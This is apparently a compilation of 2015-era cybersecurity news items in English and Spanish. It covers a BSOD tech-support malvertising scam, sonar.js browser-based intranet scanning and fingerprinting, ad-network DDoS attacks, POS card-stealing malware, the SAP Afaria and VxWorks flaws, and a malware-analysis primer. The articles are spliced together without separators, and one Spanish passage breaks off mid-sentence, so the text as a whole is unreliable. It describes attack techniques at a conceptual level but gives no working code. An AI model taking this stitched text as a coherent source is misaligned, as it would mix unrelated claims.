Malware creators are hijacking Microsoft Windows’ infamous BSOD in a fresh malvertising campaign.
A new malvertising campaign uses the Blue Screen of Death to scam users into handing over their money and potentially their identity.
Online search engines are used daily by millions of web users. In order to support the vast amounts of requests these search engines receive and process, search engine providers — such as Google, Yahoo and Microsoft — offer advertising platforms and packages for businesses. Users view sponsored links placed high up on a search results page, businesses gain more exposure and the search engine generates revenue.
However, search engine advertising is also a place ripe for exploit and is being used by cyberattackers in order to generate their own revenue. One of the most commonly-known techniques include setting up malicious domains which deliver malware payloads to victim machines — resulting in slave systems, compromised PCs and data theft. Some attackers also set up fraudulent domains which appear legitimate in order to lure victims to input their account information.
Unfortunately, many online advertisement schemes run through third-party platforms and sometimes threat actors slip through the net — resulting in fraudulent and malicious links being displayed on legitimate, trustworthy domains.
Now, a new and rather novel campaign has attracted cybersecurity firm Malwarebytes’ attention.
In a blog post on Monday, the team at Malwarebytes revealed their findings on a new malvertising campaign which uses the infamous Microsoft Windows’ Blue Screen of Death (BSOD) as its selling point.
The group uses BSOD to reel in potential victims as a social engineering technique. The security company found attackers bidding on popular phrases through Google’s AdWords advertising space, including the YouTube keyword to display their adverts at the top of the search engine. This link is meant to go to the designated YouTube URL, but instead, clicking on this advert leads to a convincing web page complete with the BSOD image.
While some users will not be fooled, others without much technical knowledge are likely to be.
On the page, users are instructed to call a toll-free “helpline” to resolve the BSOD issue. The scammers are waiting at the other end for these calls, where they pretend to be Windows support and offer their victims expensive and non-existent “support packages” — defrauding users of anything from $199 to $599.
However, this isn’t necessary the end of a painful story. Malwarebytes says innocent PC users may also end up having their identity stolen and bank accounts rinsed of funds.
In this particular campaign, at least two domains have been registered to redirect users to the fraudulent pages through IP addresses in Arizona.
The campaign was reported to Google and the adverts were immediately pulled, but this is is only one such campaign out of thousands of scams appearing every day online.
Según una encuesta por empresa de seguridad informática, la mayoría de las personas creen que mientras se navegan por la Web que están protegidas por firewalls y redes aisladas a través de direcciones privadas del IP NAT. Con este entendimiento, asumimos la seguridad de los sitios web de intranet y las interfaces basadas en routers, cortafuegos, impresoras, teléfonos IP, sistemas de nómina, etc., aunque dejamos sin parchear. Pensamos que permanecen seguro dentro de la zona protegida y nada es capaz de conectar directamente desde el mundo exterior, ¿no?
Bueno, no del todo. Navegadores web pueden ser completamente controlados por cualquier página web, lo que les permite atacar los recursos de la red interna acuerdo con profesores de formación de hacking ético. La navegador web de cada usuario en una red empresarial se puede cambiar en un trampolín para los intrusos sin soluciones de seguridad perimetral avanzados.
Una víctima visita una página web maliciosa, que asume el control de su navegador Web. La página web maliciosa podría ser cualquiera página web, atada con un ataque XSS permanente que hackers están siendo aprovechado para la entrega de malware masivo.
Cuando se ejecuta el malware, lo hace desde la perspectiva de la intranet de la víctima, donde nadie puede acceder directamente. Esto quiere decir que el navegador web de la víctima puede ser instruido para entregar su dirección de NAT IP y hacer conexiones en la red interna en nombre del atacante o víctima.
El malware utiliza navegador web de la víctima como una plataforma de lanzamiento, donde el malware hace los análisis de puertos, fingerprinting de los servidores web en la red interna y revisa las soluciones de seguridad perimetral implementadas.
El malware se inicia los ataques contra los objetivos internos y la información comprometida se envía fuera de la red para la colección.
Es fácil a obtener la dirección IP pública de un navegador web desde el servidor web, pero la dirección IP interna es poco difícil menciona profesores de formación de hacking ético. Esta es la pieza de información que necesitamos para comenzar a explorar y explotar intranet. Para obtener IP interna, tenemos que invocar Java en un navegador y un applet. Eso es una forma sencilla de hacerlo. El siguiente código carga el MyAddress.class y luego abre la URL de
Si el navegador web de la víctima es una Mozilla / Firefox, es posible omitir el requisito subprograma e invocar una socket de Java directamente desde el JavaScript.
Sonar.js es un marco que utiliza JavaScript, WebRTC, y algunas funciones onload para detectar dispositivos internos en una red. sonar.js funciona mediante la utilización WebRTC para enumerar hosts en vivo en la red interna. Mike Stevans profesor de formación de hacking ético explica que tras enumerar las direcciones internas sonar.js intenta vincular a los recursos estáticos como CSS, imágenes y JavaScript, mientras que conecta el controlador de eventos onload. Si carga los recursos con éxito e inicia el evento onload entonces sabemos que el anfitrión tiene este recurso.
¿Por qué es útil saber? Al obtener una lista de los recursos alojados en un dispositivo, podemos intentar hacer fingerprinting de los dispositivos y soluciones de seguridad perimetral.
Sonar js
¿Cómo funciona Sonar?
Al cargar payload de sonar.js en un navegador web moderno sucederá lo siguiente:
sonar.js utilizará WebRTC para enumerar lo IPs internas que tiene el usuario
sonar.js luego intenta encontrar otros hosts en vivo de la red interna a través de webSockets.
Si no se encuentra una gran cantidad en vivo, sonar.js comienza a intentar hacer fingerprinting mediante la vinculación a ella a través de
<img src=”x”> and <link rel=”stylesheet” type=”text/css” href=”x”>
y enganchar el proceso de onload. Si el recurso carga con éxito se activará un evento para lanzar el exploit acuerdo con resultados de fingerprinting.
Sonar.js trabaja sobre una base de datos de fingerprints. Fingerprint es simplemente una lista de los recursos conocidos en una red que se pueden vincular a y detectados a través onload. Ejemplos de esto incluyen imágenes, hojas de CSS style, e incluso JavaScript externo.
Sonar-chrome
Acuerdo con expertos de empresa de seguridad informática, mediante la creación de sus propias fingerprints se puede construir exploits personalizados que serán lanzadas contra los dispositivos internos una vez que son detectados por sonar.js. Exploits comunes incluyen cosas como la Cross-site Request Forgery (CSRF), Cross-site Scripting (XSS), etc. La idea es que usted puede utilizar estas vulnerabilidades para hacer cosas tales como modificar configuraciones DNS del router, el sacar archivos desde un servidor de archivos interno, y más.
Mediante el uso de sonar.js pentesting puede construir exploits contra los servidores internos de registro, routers, impresoras, teléfonos VOIP, y más menciona expertos de soluciones de seguridad perimetral . Debido a las redes internas a menudo están menos vigiladas, ataques como CSRF y XSS pueden ser de gran alcance para hacerse cargo de las configuraciones de los dispositivos internos de una red.
Two years ago at the Black Hat conference, WhiteHat Security researchers Jeremiah Grossman and Matt Johansen explained how hackers could in theory leverage an online ad network to distribute malicious JavaScript efficiently and quickly.
Depending on how much money the attacker wanted to spend, they could do just about anything from drive-by download attacks, to search engine poisoning to DDoS attacks.
“For a DDoS attack, for mere dollars we could bring down one Apache server very quickly for probably under $10 and hold it down for a long time,” Grossman told Threatpost in 2013. “I don’t know if it has good DDoS protection how much it would cost us, but it probably wouldn’t cost $100. This means that anyone without DDoS protection is susceptible to a $10 attack that could bring them down.”
Using JavaScript to bring down a target has slowly moved out of the theoretical, given the Great Cannon research done earlier this year by Citizen Lab and a JavaScript-based DDoS attack against 8chan that originated in malicious image files hosted on Imgur. CloudFlare on Friday described a voluminous attack against an unnamed customer that it speculates could have been launched using a mobile ad network.
Researcher Marek Majkowski said the flood attacks peaked at 275,000 HTTP requests per second close to 1.2 billion requests per hour during a four-hour span. Most of the requests came from mobile browsers based in China.
“There is no way to know for sure why so many mobile devices visited the attack page, but the most plausible distribution vector seems to be an ad network,” Majkowski wrote. “It seems probable that users were served advertisements containing the malicious JavaScript. [These] ads were likely showed in iframes in mobile apps, or mobile browsers to people casually browsing the internet.”
Majkowski said this was not a packet-injection type of attack. Instead it’s likely, users’ mobile browsers were served iframes with ads requested from a mobile ad network. The networks forwarded the requests to the malicious third parties which won the real-time bidding for the slot. The user was served a page containing malicious JavaScript that sent a flood of XHR requests against the targeted website, CloudFlare said.
“It seems the biggest difficulty is not in creating the JavaScript — it is in effectively distributing it. Since an efficient distribution vector is crucial in issuing large floods, up until now I haven’t seen many sizable browser-based floods,” Majkowski said. “Attacks like this form a new trend. They present a great danger in the internet — defending against this type of flood is not easy for small website operators.”
It has been reported that a vulnerability in iPhones means that a hacker can wirelessly hijack your iPhone if they are within Bluetooth range. Australian security researcher and consultant Mark Dowd revealed that iOS 9 includes a patch for this security vulnerability, which he warned Apple about just over a month ago. Tim Erlin, director of security and product management at Tripwire commented on hacking iphone within the bluetooth range.
Tim Erlin, Director of Security and Product Management at Tripwire :
iPhone can be Hacked if within Bluetooth Range
“Vulnerabilities like this one should remind users of the importance of keeping your systems current with security updates. Unfortunately, those who would most benefit from hearing this advice are also the hardest to reach. There’s no doubt that this vulnerability will persist and be exploited on devices that aren’t updated.”
Tripwire is a leading provider of advanced threat, security and compliance solutions that enable enterprises, service providers and government agencies to confidently detect, prevent and respond to cybersecurity threats. Tripwire solutions are based on high-fidelity asset visibility and deep endpoint intelligence combined with business-context and enable security automation through enterprise integration. Tripwire’s portfolio of enterprise-class security solutions includes configuration and policy management, file integrity monitoring,vulnerability management and log intelligence.
Someone has hacked the Hilton’s sales registers, and made off with guests’ credit-card details, it’s claimed. The hotel chain confirmed today it is investigating the alleged breach of its computer security.
Investigative journo Brian Krebs says malware in point-of-sale (POS) terminals is believed to have nicked the card information, some of which is already being used to make fraudulent transactions, we’re told.
Multiple sources have told Krebs that bank staff have traced the misused cards to a common source: the tills at restaurants and gift shops in various Hilton hotels around the US.
It is not clear how many accounts may have been compromised, but the malware was active from April 21 to July 27 of this year, apparently. Visa reportedly issued a security alert on the security breach back in August.
Hilton hotels in credit-card-stealing malware infection scare
Sales terminals in Doubletree, Embassy Suites, Hampton, and Waldorf Astoria hotels were also compromised, it is claimed.
A Hilton spokesperson told The Register late on Friday afternoon:
Hilton Worldwide is strongly committed to protecting our customers’ credit card information. We have many systems in place and work with some of the top experts in the field to address data security. Unfortunately the possibility of fraudulent credit card activity is all too common for every company in today’s marketplace. We take any potential issue very seriously, and we are looking into this matter.
If Krebs’ sources are on the money, Hilton will be the latest major American chain to suffer a massive credit card security breach as the result of a malware incursion. Criminals typically plant malware on PC-like tills to collect credit card information when a purchase is made, and then siphon off the numbers.
The company hired by the Kremlin to gather information on and crack the anonymous browser Tor is now looking to pay more than the contract’s value in legal fees to back out of the agreement, according to Bloomberg.
Last year, Russia’s Interior Ministry offered a contract, then worth approximately $110,000, “to study the possibility of obtaining technical information on users and users’ equipment of Tor anonymous network,” in an attempt to crack the anonymity offered by the network.
A Russian firm tasked with gathering information on Tor users is paying more than the value of the contract to back out of the agreement.
The Central Research Institute of Economics, Informatics, and Control Systems, a state-run maker of helicopters, weapons, and other military and industrial equipment, accepted the contract.
The firm was not able to hack into the browser, according to online Russian news site Meduza.
Documents obtained from a database of state-purchased disclosures revealed the company agreed to pay $150,000 in legal fees to abandon the Tor project and several other classified government contracts, according to the Bloomberg report.
Lawyers from Pleshakov, Ushkalov and Partners are negotiating with Russian officials to help the firm reach a settlement.
In June this year, we reported how Facebook was sued by Belgium’s Privacy Commission (BPC) fortracking users even those who never made a profile on the social media site.
Now, Frederic Debussere (representative of the Belgian Privacy Commission/BPC) in his opening arguments on Monday, referred to Edward Snowden, the famous NSA whistleblower, while revealing the mass surveillance program of theNSA.
He said:
“WHEN IT BECAME KNOWN THAT THE NSA WAS SPYING ON PEOPLE ALL AROUND THE WORLD, EVERYBODY WAS UPSET. THIS ACTOR [FACEBOOK] IS DOING THE VERY SAME THING, ALBEIT IN A DIFFERENT WAY.”
Detailed Analysis:
The BPC accused Facebook of “trampling” over European and Belgian privacy law and brought a lawsuit against the social network.
The details of the alleged breaches from Facebook can be found in a report from the BPC, in which the commission mentioned that Facebook tracked non-users and those who already had logged out from the site for advertising purposes.
Reportedly, Facebook is being threatened by the BPC for a fine of $250,000 per day for not responding to its demands.
The Cookie Aspect:
Facebook has categorically denied the claims and states that the data and information presented by the BPC in its privacy report are false.
According to an official Facebook spokesperson the social network is adamant to “show the court how this technology protects people from spam, malware, and other attacks, that our practices are consistent with EU law and with those of the most popular Belgian websites,” according to the Guardian.
Moreover, Facebook repeatedly has mentioned that all of its operations and practices in European regions are audited and controlled under the Irish data protection agency. The headquarters of Facebook’s European branch is also situated in Dublin, Ireland.
A representative of Facebook, Paul Lefebvre said:
“How could Facebook be subject to Belgian law if the management of data gathering is being done by Facebook Ireland and its 900 employees in that country?”
Belgians need not to ‘be intimidated’ by Facebook:
The whole of Europe is watching the case intently since data privacy regulators throughout the region, even in the Netherlands, have started to point fingers at the privacy practices of Facebook.
REMOTE MANAGEMENT SYSTEMS for mobile phones are supposed to make it easy for companies to wipe a device clean if it gets lost or stolen. But a vulnerability discovered in a popular remote management system used by thousands of businesses to manage employee mobile phones would allow an attacker to wipe a CEO’s phone clean, steal the phone’s activity log, or determine the executive’s location, researchers say.
The Hack
The hack involves an authentication bypass vulnerability in SAP AG’s Afaria mobile management system used by more than 6,300 companies. Ordinarily, system administrators send a signed SMS from an Afaria server to lock or unlock a phone, wipe it, request an activity log, block the user, disable the Wi-Fi or obtain location data. But researchers at ERPScan found that the signature is not secure.
The signature uses a SHA256 hash composed from three different values: the mobile device ID, or IMEI; a transmitter ID, and a LastAdminSession value. An attacker can easily obtain the transmitter ID simply by sending a connection request to the Afaria server over the Internet, and the LastAdminSession—a timestamp indicating the last time the phone communicated with the Afaria server—can be a random timestamp. The only thing the hacker needs to direct the attack, then, is someone’s phone number and IMEI, or International Mobile Station Equipment Identity. Phone numbers can be obtained from web sites or business cards, and an attacker can determine the IMEI number of devices by sniffing phone traffic at a conference or outside a company’s office, using a home-made stingray-like device. Since IMEI numbers are often sequential for corporations who purchase phones in bulk, it’s possible for an attacker to guess the IMEI’s for other phones belonging to a company simply by knowing one.
Who’s Affected?
Because the vulnerability is in the management system, not a phone’s operating system, it affects all mobile operating systems used with the Afaria server—Windows Phone, Android, iOS, BlackBerry and others. Afaria is considered one of the top mobile device management platforms on the market, and ERPScan estimates that more than 130 million phones would be affected by the vulnerability. The ERPScan researchers presented their findings last week at the Hacker Halted conference in Atlanta, but say many companies who use the Afaria system did not get the message.
SAP AG, a German-based company, has issued a patch for the vulnerability, but Alexander Polyakov, CTO of ERPScan, says his company, which specializes in Systems Applications and Product security, often finds businesses with years-old vulnerabilities unpatched in their SAP systems.
“The administrators usually don’t apply patches especially with SAP [systems] because it can affect usability,” he notes. “So what we see in the real environment is, we see vulnerabilities that were published three years ago but are still in the system [unpatched]. They really need to implement these patches.”
How Severe Is This?
The vulnerability is somewhat similar to the recent Stagefright security hole that hit Android in that both attacks involve sending a text message to a phone. But Stagefright, which would allow an attacker to execute remote code on a phone to steal data from it, affects only Android phones, whereas the SAP Afaria vulnerability affects a broader range of mobile phones and devices. Although wiping data from a phone isn’t catastrophic—if there is a backup from which the phone can be restored—not all employees and businesses back up phone data. And even if phones are backed up, it can take days to restore them if an attacker wipes numerous phones at a company.
The authorization bypass vulnerability wasn’t the only flaw ERPScan researchers discovered in the SAP Afaria system. They also found hard-coded encryption keys as well as a cross-site scripting vulnerability that would allow an attacker to inject malicious code into the Afaria administrative console and potentially use it to deliver malware to employee phones. SAP has patched this flaw as well.
Researchers detected 200 Cisco routers with malicious firmware in 31 countries, with the U.S. having the largest number of potentially infected routers.
Attackers have installed malicious firmware on nearly 200 Cisco routers used by businesses from over 30 countries, according to Internet scans performed by cyber crime fighters at the Shadowserver Foundation.
Last Monday, FireEye subsidiary Mandiant warned about new attacks that replace the firmware on integrated services routers from Cisco Systems. The rogue firmware provides attackers with persistent backdoor access and the ability to install custom malware modules.
At the time Mandiant said that it had found 14 routers infected with the backdoor, dubbed SYNful Knock, in four countries: Mexico, Ukraine, India, and the Philippines. The affected models were Cisco 1841, 8211, and 3825, which are no longer being sold by the networking vendor.
Since then, the Shadowserver Foundation, a volunteer organization that tracks cyber crime activities and helps take down botnets, has been running an Internet scan with Cisco’s help in order to identify more potentially compromised devices.
The results confirmed Mandiant’s suspicions: there are more than 14 routers infected with SYNful Knock out there. Shadowserver and Cisco identified 199 unique IP (Internet Protocol) addresses in 31 countries that show signs of compromise with this malware.
The U.S. has the largest number of potentially infected routers, 65. It is followed by India with 12 and Russia with 11.
Shadowserver plans to start notifying network owners who have signed up for the organization’s free alert service if any of the compromised routers fall into their IP blocks.
“It is important to stress the severity of this malicious activity,” the organization said Monday in a blog post. “Compromised routers should be identified and remediated as a top priority.”
By controlling routers, attackers gain the ability to sniff and modify network traffic, redirect users to spoofed websites and launch other attacks against local network devices that would otherwise be inaccessible from the Internet.
Since the devices targeted by the SYNful Knock attackers are typically professional-grade routers used by businesses or ISPs, their compromise could affect large numbers of users.
Cisco has been aware of attackers using rogue firmware implants for several months. The company published a security advisory in August with instructions on how to harden devices against such attacks.
Software malicioso puede ser virus, gusano, Troyano, Rootkit, Bot, herramienta de DoS, Exploit Kit, spyware. El objetivo del análisis de malware es tener una comprensión de la forma de trabajo de piezas específicas de malware. Hay preguntas importantes que deben ser contestadas. Al igual que, ¿cómo se infecta máquina y qué hace exactamente malware? En este artículo vamos a tratar de entender con la ayuda de Bill Smith, experto de soluciones de seguridad informática, los conceptos básicos de análisis de malware y cómo se puede empezar a hacer análisis de malware.
¿Quién analiza el malware?
Hay diferentes tipos de personas y organizaciones que hacen análisis de malware. Todos ellos caen bajo de estas categorías:
• CSIRT
• Desarrolladores de productos de seguridad
• Los proveedores de servicios de seguridad
• Investigadores de Anti-virus
• Los desarrolladores de software
• Agencias de seguridad del gobierno
¿Por qué hay una necesidad de analizar el malware?
Las siguientes son las razones detrás de análisis de malware.
• Disponer un procedimiento de respuesta a incidentes de hacking.
• Para hacer el desarrollo de productos y la mejora de productos como anti-virus.
• Para la creación de firmas para la protección contra el malware.
• Para crear soluciones de contramedidas.
• Para hacer el análisis y resolución de vulnerabilidad.
• Para rastrear y capturar a los delincuentes que crean el malware.
Métodos de análisis de malware
De acuerdo con expertos de formación de seguridad informática, para hacer análisis de malware tiene que seguir estos pasos:
1. Configuración del entorno
Configurar una máquina controlada que no está conectada a la red, también debe ser capaz de restaurar esta máquina en cualquier momento.
2. Colección del Malware
Para configurar el entorno es necesario descargar el archivo de malware primero, y entonces usted necesita cambiar extensión de archivo. De acuerdo con las sugerencias de expertos en curso de hacking ético, después de bajar el archivo se puede copiar el archivo en un disco protegido ya que esto puede ayudar a aislar el malware en algunos casos.
3. Análisis de superficie
Recuperar información de superficie de maquina con malware sin ejecución. Motivo de análisis de superficie es conseguir:
• Valor Hash
• Tipo de archivo
• Strings
• Los resultados de programas antivirus
4. Análisis en tiempo de ejecución
En este paso se puede ejecutar malware y observar su comportamiento. Puede utilizar varios métodos de análisis automatizados o manuales. Puede utilizar las herramientas de observación en el sistema de sandbox para su análisis. Todo el ambiente se puede ser dedicado o aislado OS nativo o sistema virtual explica Mike Stevens, especialista del Mike Stevens, experto de formación de seguridad informática.
5. Análisis estático
En el análisis estático debe leer el código en el archivo binario y entender su funcionamiento. Usted necesitará el conocimiento del sistema operativo, básico de lenguaje ensamblador, técnicas de lectura eficientes y técnicas anti-análisis. Si está packed el código binario tendrá que hacer unpacking. Además para entender el binario, usted tendrá que descompilar o hacer disassemble/debug del binario.
Puede utilizar siguientes herramientas para el análisis estático:
Disassembler
IDA Interactive DisAssemble: Se desensamblar más de 50 arquitecturas
Decompiler
Hex-rays Decompiler: x86/ARM binario a codigo de C.
VB Decompiler: Binario de Visual Basic a código fuente de Visual Basic.
.NET Reflector: .NET binario a código fuente de .NET.
Debugger
OllyDbg: Muy famoso x86 debugger
Immunity Debugger: x86 debugger de Python
Para entender el código, puede comenzar con las API de Windows de MSDN Library y entender lo que hace el API. También puede comprobar que hacen argumentos y condiciones. Mientras se utiliza un Disassembler, se puede leer, cambiar el nombre y comentar instrucciones para entender el código. Usted puede aprender más sobre Disassembler en curso de formación de hacking ético.
6. Codificación (ofuscación) en Malware
A veces el programador de malware hace ofuscación del código para hacer que sea difícil para que usted pueda hacer el análisis del código.
Nombre de archivo, nombre de la entrada del registro, dirección del servidor almacenada en el binario se codifican como strings. Además paquetes de datos de HTTP pueden ser codificados utilizando diferentes métodos. Algunos de los métodos de codificación son
• xor (exclusive or)
• ror/rol (rotate right/left)
• base64
• RC4
• AES
También todo los malwares estos días usan C&C servidor (servidor de comando y control) para obtener los comando, devolver los resultados y datos. Los hackers pueden crear servidores C&C utilizando servidores hackeados, sitios web o cuentas de correo electrónico. También se pueden utilizar Twitter y Facebook cuentas como servidor C&C, de manera que no podemos rastrearlos. Pueden aprender cómo crear servidor C&C utilizando cuentas de redes sociales durante la capacitación de la seguridad informática de iicybersecurity.
7. Prevenir análisis de Malware en tiempo de ejecución
Algunos tipos de malware son lo suficientemente inteligente como para detectar la actividad de análisis por lo tanto tienen una lógica para evitar el análisis por los analistas de malware explica experto soluciones de seguridad informática. Algunas de las técnicas utilizadas para detectar análisis de malware son:
Debugger: Para comprobar si hay debuggers, el malware revisa por puntos de interrupción, manejo de excepciones.
Máquina virtual: Para comprobar si hay máquina virtual, el malware revisa por la interfaz, el comportamiento de la CPU, Herramientas de soporte (como el Virtual box).
Herramientas de análisis: Para comprobar si hay herramienta de análisis de malware como IDA Pro, el malware revisa por el nombre de la ventana, el nombre del módulo.
El malware veces también puede comprobar el nombre del ordenador, el tamaño del disco, la posición del cursor para evitar el análisis de malware. Después de detectar que se realiza el análisis de malware, lo hace algo diferente o no hace nada.
Vamos a cubrir más detalles en profundidad sobre análisis de malware en el próximo artículo con la ayuda de Mike Stevens, profesor de formación hacking ético.
As expected, Google formally announced its intent to move away from the stream cipher RC4 and the SSLv3 protocol this week, citing a long history of weaknesses in both.
Adam Langley, a security engineer for the company, announced the plans through a blog post on Thursday. While there isn’t a concrete timeline, Langely insisted that Google is looking to do away with support for RC4 and SSLv3 in all of its frontend servers, Chrome, Android, webcrawlers, and SMTP servers, in the medium term.
The fact that the company is looking cut ties with both mediums shouldn’t come as little surprise.
The Internet Engineering Task Force condemned SSLv3 in an Internet Standards Track document over the summer, calling it “not sufficiently secure,” adding that “any version of TLS is more secure than SSLv3.”
As Langely notes in the blog, RC4 is 28 years old, and while it fared well in the early goings, it’s been the target of multiple attacks over the years, including some that can lead to TLS session compromise and cookie decryption.
Google Details Plans to Disable SSLv3 and RC4
As part of the switch Google also announced a collection of minimum standards for TLS clients going forward. According to the post, Google will eventually require the following of devices:
TLS 1.2 must be supported.
A Server Name Indication (SNI) extension must be included in the handshake and must contain the domain that’s being connected to.
The cipher suite TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 must be supported with P-256 and uncompressed points.
Certificate handling must be able to support DNS Subject Alternative Names and those SANs may include a single wildcard as the left-most label in the name.
Langley notes that devices that don’t meet the requirements won’t stop working anytime soon, but acknowledges they may be affected by TLS changes later down the line, up to the year 2020.
“If your TLS client, webserver or email server requires the use of SSLv3 or RC4 then the time to update was some years ago, but better late than never. However, note that just because you might be using RC4 today doesn’t mean that your client or website will stop working: TLS can negotiate cipher suites and problems will only occur if you don’t support anything but RC4,” Langley wrote.
Langely announced cursory plans to deprecate RC4 earlier this month in a post to the security@chromium.org mailing list, confirming that the cipher would be disabled in a future Chrome build, likely stable around January or February 2016.
The company has already taken one step towards nixing SSLv3: a month after last fall’s POODLE attack it did away with support for the fallback to SSLv3 in Chrome, a move that went hand in hand with the company’s phasing out of the SHA-1 cryptographic hash algorithm.
Security experts at Doctor Web have discovered a new PoS Trojan dubbed MWZLesson that borrows code from other popular malicious software.
Security experts at Dr. Web have discovered a new PoS Trojan that was designed by mixing code from other malware.
The new PoS Trojan, dubbed Trojan.MWZLesson, was designed reusing the code of other popular malware, including the Dexter PoS and the Neutrino backdoor.
“This code was borrowed from another Trojan designed for POS terminals and named Trojan.PWS.Dexter. The malware sends all acquired bank card data and other intercepted information to the command and control server.” states the blog post published by Dr. Web.
Like its predecessors, MWZLesson compromises the POS terminals, scraping the RAM memory to search for credit card data. Once infected the PoS system, the malware communicates with the server over the HTTP protocol, it steals card data and sends it to the command and control server through GET and POST requests.
“Trojan.MWZLesson can intercept GET and POST requests sent from the infected machine’s browsers (Firefox, Chrome or Internet Explorer). Such requests are forwarded to the command and control server run by cybercriminals.” continues the post.
Trojan.MWZLesson can update itself, download and run additional files, find specific documents, and even mount an HTTP Flood attack.
The experts at Dr.Web discovered that the Trojan.MWZLesson also implements features to avoid detection and eradicate other malware that infected the PoS malware.
“Trojan.MWZLesson checks for virtual environments and debuggers and gather information on the infected machine. The newly discovered PoS malware is able to remove other malware present on the machine and is able to exfiltrate different kinds of data.”
The discovery of the Trojan.MWZLesson confirms the great interest of the criminal crews in infecting POS terminals and their abilities in recyclying code of older and efficient malware.
The infamous Russian hacker, Vladimir Drinkman, has admitted his contribution in what has been regarded by the Justice Department as “the largest such scheme ever prosecuted in the United States.”
Vladimir Drinkman has pleaded guilty and faces court trial along with four other defendants. The group was accused of hacking corporate computers including machines owned by firms such as Diners Singapore, Nasdaq, JCP, 7-Eleven, Dow Jones, Jet Blue, Ingenicard and Visa Jordan and stealing around 160million credit card numbers. Due to the hacks that they conducted, the corporate sector suffered great losses (approximately $300million), which doesn’t include the losses suffered by private individuals whose credit card data was also stolen.
Drinkman initially pled not guilty after being caught while he was travelling to Amsterdam in 2010. He was immediately sent back to the United States to face the trial. However, this year he changed his tune completely when he was brought to a New Jersey district court in front of Chief Judge Jerome Simandle.
The US Department of Justice maintains that this group of hackers used to monitor the computer systems of hackers for months on end and then they used to exploit the identified SQL database vulnerabilities to infiltrate their networks. Usually, they would leave open a backdoor to compromise the network later. They used to exploit the security holes to install “sniffers,” a type of malware that gather and pilfer user data like the Social Security numbers, credit card numbers and similar crucial information from the targeted computers. These details were then sold to shady online entrepreneurs, who in turn would sell them on different online forums.
Reports suggest that Drinkman and his fellow hackers were extremely careful in their feats since they used encrypted channels only to communicate and even used security software to enhance the layer of protection. They also used to alter the network settings of their victims to prevent their actions from being logged into the computers. However, despite all these measures, Drinkman and co are now behind bars and are facing a maximum penalty of 30 years in prison. Since Drinkman has pleaded guilty his sentence might be lesser than that of his aides. But, we cannot be sure about their sentences until the group actually get convicted on 15th January 2016.
Microsoft has taken NATOonboard in its program which presents information about vulnerabilities and provides access to source code.
A Security Agreement between NATO and Microsoft has been signed, which gives NATO the authority to vet the source code of Microsoft’s products for backdoors.
This deal can be regarded as an extension of the 12-year cybersecurity partnership that Microsoft has had with the NATO Communications Information/NCI. This also marks the agreement of Redmond Company’s latest Government Security Program/GSP
A similar deal between EU and Microsoft was signed in June this year after which the Windows developer established its second European Transparency Centre in Brussels. This facility has been opened to allow governments to have a safe place to review its source code.
Microsoft explained that this deal will give the NCI agency powers to access technical information and documentation about the products and services of Microsoft along with product vulnerability information and threat intelligence.
Koen Gijsbers NCI Agency General Manager said,
“NATO IS FACING NEW AND INCREASINGLY DANGEROUS THREATS TO CYBERSECURITY ACROSS THE WORLD AND THESE THREATS COULD AFFECT NATIONAL ECONOMIES AND CITIZENS. TO AVOID IT, NCI AGENCY STRONGLY BELIEVES IN RAPID AND EARLY INFORMATION SHARING ON THREATS AND VULNERABILITIES WITH LEADING COMPANIES WORLDWIDE, SUCH AS MICROSOFT. TRUST IS THE KEY TO SUCCESS.”
GSP was launched by Microsoft in 2003 and since then, the program has evolved greatly. Over time, it’s been transformed into a series of resources that offer government officials controlled access to its Transparency Centers, its source code and Microsoft’s vulnerability and threat intelligence services.
Currently, the products that can be vetted by NATO include different versions of Windows, Windows Servers, Windows Embedded and Lync SharePoint 2010.
After this recent development with NATO, Microsoft now has the backing of 44 agencies participating in this program from 26 governments across the globe.
According to sources at Microsoft, the GSP will also facilitate participants in planning for deployments of Windows 10 and the movement of services to the cloud.
This agreement was publicly signed at NATO’s annual cyber conference and it further progressed in the organization’s initiative called NATO-Industry Cyber Partnership. This initiative was launched in 2014. It aims to engage academia and industry partners with the 28 allies of NATO and enhance its defenses against hack-attacks that might damage its physical infrastructure.
This is not the first time when NATO has has gone in deal with an institution to tackle cyber threats. NATO is also assisting Jorden to fight-off ISIS cyber attacks.
A security researcher has uncovered two vulnerabilities in the VxWorks operating system, used among other things, with NASA’s Curiosity rover.
The researcher’s paper does not target NASA and Curiosity specifically, but the operating system on which the rover runs, VXWorks, used on Mars in one device, and on Earth in over 1.5 billion.
VxWorks, a very secure real-time OS for the Internet of Things
The operating system, created in 1987 by US company Wind, an Intel subsidiary, has been deployed in countless of devices ranging from Boeing 787 planes to industrial robots, from network routers to medical equipment.
Yannick Formaggio, a Canadian security expert, was asked by one of his clients to conduct research into the operating system’s security features before making a decision to deploy it for their own industrial equipment.
After conducting his inspection, Mr. Formaggio found the “real-time” OS to be very secure, with the exception of two critical issues.
Issues found: a backdoor and a ring buffer overflow
The first is a backdoor, which could be created without detection, if he supplied negative values in the login fields.
This allowed Formaggio to bypass memory protections and create a root level account on the operating system without having proper credentials to do so.
The second was a ring buffer overflow in VxWorks operating system built-in FTP server, which crashed when it received maliciously crafted username & password details at very high speeds. This bug only led to a Denial of Service (DoS) for the device’s network capabilities.
Affected VxWorks versions are 5.5 to 6.9.4.1. Wind was informed of the exploits at the end of July and has provided patches.
VxWorks is one of the most used operating system for connecting IoT-enabled devices, and the code was remotely exploitable and invisible to rightful administrators. It is recommended that all VxWorks devices be updated as soon as possible.
Mr. Formaggio presented his research at the 44CON security conference in London.
Recently Microsoft addressed vulnerabilities in their recent products . Some of the bugs were severe to the extent that they can enable code execution at the remote server .
Wolfgang Kandek, CTO of Qualys confirmed that the highest priority patch is MS15-097 , which includes critical bug fixes for Windows Vista, Windows Server 2008, Microsoft Office 2007 and 2010, and Lync 2007, 2010, and 2013.
Talking about bugs, there was a Win32k memory leak, named CVE -2015-2546 found in all versions of window was deemed important and discussed in open. One of the other flaws was CVE-2015-2545, a microsoft Office malformed EPS file. This bug allowed remote code execution and has been fixed in bulletin MS15-099 along with other bug fixes.
Other bulletins that has bug fixes have been released , namely MS15-094 through MS15-103 . MS15-094 addresses all the issues regarding browsers ,that is vulnerability in internet explorer and Edge browser has been fixed in this bulletin . MS15-098 bulletin addresses remote code execution for journal bug , MS15-103 addresses problems in exchange servers like microsoft outlook .
Malware has been used to make ATMs dispense cash since as far back as 2013, but FireEye Labs said on Friday that it had discovered the first multi-vendor ATM malware specifically targeting cardholders.
